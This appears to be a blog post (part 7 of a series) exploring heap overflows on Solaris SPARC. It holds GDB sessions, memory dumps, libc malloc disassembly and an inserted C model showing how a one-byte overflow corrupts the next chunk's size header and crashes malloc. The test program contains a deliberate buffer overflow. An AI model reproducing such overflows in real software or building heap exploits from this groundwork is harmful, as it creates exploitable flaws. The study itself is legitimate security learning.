Uncovering ‘W(1)’ Heap Overflow Exploit — Pt 7
Messing with programs, I learned that there is an 8-byte window after the buffer, where the first 4 bytes actually “say” something.. Don’t know what yet.. but all it takes is for that first byte to be overwritten AND a subsequent call to malloc() to cause a segmentation fault of some sort.. No calls to free() necessary.. What is happening?!? I need to learn about the SVR4 malloc implementation and GDB sessions to find out :D
bazz@blade72[pts/1][/tmp] vi d.c
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
11 memset(p, 'A',800);
12
13
14 func();
15 }
"d.c" 15L, 171C written
bazz@blade72[pts/1][/tmp] gcc -g d.c
bazz@blade72[pts/1][/tmp] gdb a.out
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) list func
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
(gdb)
11 memset(p, 'A',800);
12
13
14 func();
15 }
(gdb) b 12
Breakpoint 1 at 0x1076c: file d.c, line 12.
(gdb) b 5
Breakpoint 2 at 0x10724: file d.c, line 5.
(gdb) r
Starting program: /tmp/a.out
Breakpoint 1, main (argc=1, argv=0xffbef05c) at d.c:14
14 func();
(gdb) p/x p
$1 = 0x209f8
(gdb) x/96x p
0x209f8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a68: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20aa8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ab8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ac8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ad8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ae8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20af8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b68: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20b78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ba8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bc8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bd8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20be8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bf8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c68: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ca8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cc8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cd8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ce8: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20cf8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d18: 0x00001cc8 0x00000000 0x00000000 0x00000000
0x20d28: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d38: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d48: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d68: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d78: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d88: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d98: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e08: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e18: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e28: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e38: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e48: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e68: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:5
5 getchar();
(gdb) p/x penis
$2 = 0x20d20
(gdb) x/96x penis
0x20d20: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d30: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d40: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d50: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d60: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d70: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d80: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d90: 0x42424242 0x42424242 0x42424242 0x42424242
0x20da0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20db0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dc0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dd0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20de0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20df0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e00: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e10: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e20: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e30: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e40: 0x42424242 0x42424242 0x42424242 0x00000000
0x20e50: 0x00001b90 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/96x penis-8
0x20d18: 0x00000131 0x00000000 0x42424242 0x42424242
0x20d28: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d38: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d48: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d58: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d68: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d78: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d88: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d98: 0x42424242 0x42424242 0x42424242 0x42424242
0x20da8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20db8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20de8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20df8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e08: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e18: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e28: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e38: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e48: 0x42424242 0x00000000 0x00001b90 0x00000000
0x20e58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e68: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e78: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e88: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
Major GDB learning session
I will need the malloc source code..
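Before going into the libc disassembly, here is an added example (my code, not from the post or from Solaris libc) that models what the two x/96x dumps above already show. It assumes the header layout those dumps imply, which is also consistent with the WORD/TREE layout in Solaris libc malloc.c: every chunk's data is preceded by one 8-byte WORD, whose first four bytes hold the chunk size as a big-endian 32-bit integer with bit 0 set when the chunk is busy, and whose remaining four bytes are unused. That is why penis-8 reads 0x00000131 (300 rounded up to 304 = 0x130, plus the busy bit), why the word after the 304 bytes of 'B' reads 0x00001b90 (0x1cc8 - 0x130 - 8), and why memset of 801 bytes turns the 0x00001cc8 header into 0x41001cc8: SPARC is big-endian, so the one extra 'A' lands in the most significant byte of the size word and a 7368-byte free chunk suddenly claims to be about 1 GiB. The constants and the arena image are constructed from the dump values; the offsets stand in for real addresses.

```c
/*
 * Added example, not code from the original post or from Solaris libc.
 * Models the 8-byte chunk header seen in the gdb dumps above and the
 * one-byte overflow performed by ./a.out 801, on a constructed arena image.
 * Assumed layout (inferred from the dumps): [8-byte header][data], header =
 * big-endian 32-bit size with bit 0 = busy, followed by 4 unused bytes.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WORDSIZE 8u      /* header is one 8-byte WORD */
#define ALIGN    8u      /* requests are rounded up to a multiple of 8 */
#define BIT0     1u      /* busy flag carried in the size word */
#define BITS01   3u      /* flag bits to strip before using the size */

/* Constructed image modelled on the first session: [hdr][800 x 'A'][hdr][Bottom] */
#define REQ_A       800u
#define BOTTOM_SIZE 0x1cc8u                              /* free space after p, as dumped */
#define ARENA_LEN   (WORDSIZE + REQ_A + WORDSIZE + BOTTOM_SIZE)   /* 8184 bytes */

static uint8_t arena[ARENA_LEN];

static uint32_t be32(const uint8_t *p)   /* big-endian load, as SPARC stores the word */
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Lay out a busy 800-byte chunk followed by the free Bottom chunk.
 * Returns the data offset of the 800-byte chunk (the model's "p"). */
static size_t build_arena(void)
{
    memset(arena, 0, ARENA_LEN);
    put_be32(arena, REQ_A | BIT0);                      /* 0x321: 800 bytes, busy */
    memset(arena + WORDSIZE, 'A', REQ_A);               /* memset(p, 'A', 800) */
    put_be32(arena + WORDSIZE + REQ_A, BOTTOM_SIZE);    /* 0x1cc8: free, no flags */
    return WORDSIZE;
}

/* Same rounding as the andcc/neg/add sequence at _malloc_unlocked+64..+100. */
static uint32_t round_request(uint32_t req)
{
    return (req + ALIGN - 1) & ~(ALIGN - 1);
}

/* Carve a request out of the free chunk headed at hdr_off, the way the dump
 * shows malloc(300) carving "penis" out of Bottom: the header becomes
 * rounded|BIT0 and a fresh free header follows the new chunk.
 * Returns the data offset, or 0 if the free chunk is too small. */
static size_t carve(size_t hdr_off, uint32_t req)
{
    uint32_t avail = be32(arena + hdr_off) & ~BITS01;
    uint32_t need  = round_request(req);
    if (need + WORDSIZE > avail)
        return 0;
    put_be32(arena + hdr_off, need | BIT0);
    put_be32(arena + hdr_off + WORDSIZE + need, avail - need - WORDSIZE);
    return hdr_off + WORDSIZE;
}

/* Walk the headers from hdr_off.  Returns the number of headers visited, or
 * -1 as soon as a size would carry the walk past the end of the image. */
static int walk_arena(size_t hdr_off, FILE *log)
{
    int n = 0;
    while (hdr_off + WORDSIZE <= ARENA_LEN) {
        uint32_t word = be32(arena + hdr_off);
        uint32_t size = word & ~BITS01;
        if (log)
            fprintf(log, "  hdr @+0x%04zx: size 0x%x (%s)\n", hdr_off, size,
                    (word & BIT0) ? "busy" : "free");
        n++;
        if (size == 0 || size > ARENA_LEN - hdr_off - WORDSIZE)
            return -1;                                  /* chunk runs off the arena */
        hdr_off += WORDSIZE + size;
    }
    return n;
}

/* Rebuild the image, write 800+extra bytes of 'A' into p (what
 * memset(p, 'A', atoi(argv[1])) does), then walk the heap. */
static int overflow_and_walk(size_t extra, FILE *log)
{
    size_t p = build_arena();
    if (REQ_A + extra > ARENA_LEN - p)
        return -2;                                      /* would leave the image entirely */
    memset(arena + p, 'A', REQ_A + extra);
    return walk_arena(0, log);
}

int main(void)
{
    size_t p = build_arena();
    printf("p = arena+%zu, intact heap:\n", p);
    printf("  -> %d chunks\n", walk_arena(0, stdout));

    size_t q = carve(WORDSIZE + REQ_A, 300);            /* malloc(300) out of Bottom */
    printf("penis = arena+%zu: header 0x%x, next header 0x%x\n",
           q, be32(arena + q - WORDSIZE), be32(arena + q + round_request(300)));

    printf("memset 800 bytes:\n  -> %d\n", overflow_and_walk(0, stdout));
    int r = overflow_and_walk(1, stdout);
    printf("memset 801 bytes:\n  -> %d, Bottom header now 0x%x\n",
           r, be32(arena + WORDSIZE + REQ_A));
    return 0;
}
```

Compile with something like `gcc -std=c99 -Wall walk.c` (file name arbitrary). The intact image walks cleanly as two chunks, the carve reproduces the 0x131 / 0x1b90 pair from the second dump, 800 bytes of 'A' leave the Bottom header alone, and the 801st byte makes the walker bail out because the advertised size no longer fits in the arena. The real allocator has no such guard: reading 0x41001cc8 as the size of the free chunk it is about to split sends its pointer arithmetic far past the mapped heap, which is the kind of fault the SIGSEGV inside _malloc_unlocked below is consistent with, with no free() needed.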
bazz@blade72[pts/1][/tmp] ./a.out 800
bazz@blade72[pts/1][/tmp] ./a.out 801
Segmentation Fault (core dumped)
bazz@blade72[pts/1][/tmp] gdb a.out
(gdb) r 801
Starting program: /tmp/a.out 801
Program received signal SIGSEGV, Segmentation fault.
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) backtrace
#0 0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x0001072c in func () at d.c:3
#3 0x000107b4 in main (argc=2, argv=0xffbef054) at d.c:14
(gdb) list func
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
(gdb)
11 memset(p, 'A',atoi(argv[1]));
12
13
14 func();
15 }
(gdb) b 12
Breakpoint 1 at 0x107ac: file d.c, line 12.
(gdb) b 3
Breakpoint 2 at 0x10720: file d.c, line 3.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y^CStarting program: /tmp/a.out 801
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) Quit
(gdb) r 801
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 801
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) x/96x p
0x20a40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20aa0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ab0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ac0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ad0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ae0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20af0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b30: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ba0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bb0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20bc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20be0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c30: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ca0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cb0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ce0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d30: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20d40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:3
3 char *penis = malloc(300);
(gdb) si
0x00010724 3 char *penis = malloc(300);
(gdb) x/10i $pc
0x10724 <func+8>: call 0x208f4 <malloc>
0x10728 <func+12>: nop
0x1072c <func+16>: mov %o0, %g1
0x10730 <func+20>: st %g1, [ %fp + -20 ]
0x10734 <func+24>: ld [ %fp + -20 ], %o0
0x10738 <func+28>: mov 0x42, %o1
0x1073c <func+32>: mov 0x12c, %o2
0x10740 <func+36>: call 0x20900 <memset>
0x10744 <func+40>: nop
0x10748 <func+44>: call 0x2090c <getchar>
(gdb) si
0x00010728 3 char *penis = malloc(300);
(gdb) x/10i $pc
0x10728 <func+12>: nop
0x1072c <func+16>: mov %o0, %g1
0x10730 <func+20>: st %g1, [ %fp + -20 ]
0x10734 <func+24>: ld [ %fp + -20 ], %o0
0x10738 <func+28>: mov 0x42, %o1
0x1073c <func+32>: mov 0x12c, %o2
0x10740 <func+36>: call 0x20900 <memset>
0x10744 <func+40>: nop
0x10748 <func+44>: call 0x2090c <getchar>
0x1074c <func+48>: nop
(gdb) si
0x000208f4 in malloc ()
(gdb) x/10i $pc
0x208f4 <malloc>: sethi %hi(0x1e000), %g1
0x208f8 <malloc+4>: sethi %hi(0xff2c1c00), %g1
0x208fc <malloc+8>: jmp %g1 + 0x188 ! 0xff2c1d88 <malloc>
0x20900 <memset>: sethi %hi(0x21000), %g1
0x20904 <memset+4>: sethi %hi(0xff381800), %g1
0x20908 <memset+8>: jmp %g1 + 0x70 ! 0xff381870 <memset>
0x2090c <getchar>: sethi %hi(0x24000), %g1
0x20910 <getchar+4>: b,a 0x2087c <_PROCEDURE_LINKAGE_TABLE_>
0x20914 <getchar+8>: nop
0x20918 <atoi>: sethi %hi(0x27000), %g1
(gdb) i r
g0 0x0 0
g1 0x41414141 1094795585
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x12c 300
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeef00 4290703104
o7 0x10724 67364
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x20a40 133696
i1 0x41414141 1094795585
i2 0x0 0
i3 0xffffffc0 -64
i4 0xfffffff8 -8
i5 0x20d61 134497
fp 0xffbeef78 4290703224
i7 0x107ac 67500
y 0x0 0
psr 0xfe400004 -29360124 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0x208f4 133364
npc 0x208f8 133368
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0x000208f8 in malloc ()
(gdb) i r
g0 0x0 0
g1 0x1e000 122880
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x12c 300
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeef00 4290703104
o7 0x10724 67364
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x20a40 133696
i1 0x41414141 1094795585
i2 0x0 0
i3 0xffffffc0 -64
i4 0xfffffff8 -8
i5 0x20d61 134497
fp 0xffbeef78 4290703224
i7 0x107ac 67500
y 0x0 0
psr 0xfe400006 -29360122 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0x208f8 133368
npc 0x208fc 133372
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0x208f8 <malloc+4>: sethi %hi(0xff2c1c00), %g1
0x208fc <malloc+8>: jmp %g1 + 0x188 ! 0xff2c1d88 <malloc>
0x20900 <memset>: sethi %hi(0x21000), %g1
0x20904 <memset+4>: sethi %hi(0xff381800), %g1
0x20908 <memset+8>: jmp %g1 + 0x70 ! 0xff381870 <memset>
0x2090c <getchar>: sethi %hi(0x24000), %g1
0x20910 <getchar+4>: b,a 0x2087c <_PROCEDURE_LINKAGE_TABLE_>
0x20914 <getchar+8>: nop
0x20918 <atoi>: sethi %hi(0x27000), %g1
0x2091c <atoi+4>: sethi %hi(0xff2b5c00), %g1
(gdb) p/x malloc
$1 = Value can't be converted to integer.
(gdb) disas malloc
Dump of assembler code for function malloc:
0xff2c1d88 <malloc>: save %sp, -96, %sp
0xff2c1d8c <malloc+4>: call 0xff2c1d94 <malloc+12>
0xff2c1d90 <malloc+8>: sethi %hi(0x7a000), %o1
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
0xff2c1db8 <malloc+48>: mov %l0, %o0
0xff2c1dbc <malloc+52>: ret
0xff2c1dc0 <malloc+56>: restore
End of assembler dump.
(gdb) b malloc
Breakpoint 3 at 0xff2c1d8c
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) si
0xff2c1d90 in malloc () from /usr/lib/libc.so.1
(gdb)
0xff2c1d94 in malloc () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0x21000 135168
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x7a000 499712
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeeea0 4290703008
o7 0xff2c1d8c -13886068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbeef00 4290703104
i7 0x10724 67364
y 0x0 0
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c1d94 4281081236
npc 0xff2c1d98 -13886056
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
0xff2c1db8 <malloc+48>: mov %l0, %o0
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1dc8 <_malloc_unlocked+4>: sethi %hi(0xffffdc00), %o0
0xff2c1dcc <_malloc_unlocked+8>: call 0xff2c1dd4 <_malloc_unlocked+16>
0xff2c1dd0 <_malloc_unlocked+12>: sethi %hi(0x7a000), %o1
0xff2c1dd4 <_malloc_unlocked+16>: add %o0, 0x3e7, %o0
0xff2c1dd8 <_malloc_unlocked+20>: cmp %i0, %o0
0xff2c1ddc <_malloc_unlocked+24>: add %o1, 0x23c, %o1
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0x0 0
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
